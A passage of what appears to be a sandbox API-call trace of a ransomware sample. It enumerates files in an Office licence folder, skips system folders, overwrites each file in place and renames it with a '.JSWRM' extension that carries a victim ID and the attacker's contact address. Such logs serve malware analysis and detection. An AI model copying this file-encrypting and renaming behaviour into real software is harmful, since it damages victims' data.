(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0111.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.312] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11602) returned 1 [0111.312] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.312] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0111.312] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0111.320] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.320] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0111.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.320] CloseHandle (hObject=0x45c) returned 1 [0111.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0111.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0111.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0111.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0111.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0111.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.321] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.322] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebc6fef4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebc6fef4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebd2eac2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4deb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProMSDNR_Retail-ul-phn.xrm-ms", cAlternateFileName="VI0BE7~1.XRM")) returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0111.322] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0111.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0111.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0111.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0111.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0111.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.323] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19947) returned 1 [0111.323] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0111.323] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0111.351] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.351] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0111.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.351] CloseHandle (hObject=0x45c) returned 1 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0111.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0111.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0111.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0111.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.352] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0111.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0111.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.353] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebc49c9c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebc49c9c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebd0885a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_Subscription-pl.xrm-ms", cAlternateFileName="VICA8F~1.XRM")) returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.353] lstrcmpiW (lpString1="VisioProO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0111.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0111.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.353] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0111.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0111.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-pl.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0111.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0111.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0111.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0111.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.354] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11195) returned 1 [0111.355] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0111.355] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.359] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.359] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0111.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.359] CloseHandle (hObject=0x45c) returned 1 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0111.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0111.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0111.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0111.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0111.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioproo365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0111.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0111.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0111.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.361] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.361] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec0037aa, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec0037aa, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec0c233c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x53a4, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProO365R_Subscription-ppd.xrm-ms", cAlternateFileName="VI8A1E~1.XRM")) returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.361] lstrcmpiW (lpString1="VisioProO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.361] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0111.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProO365R_Subscription-ppd.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 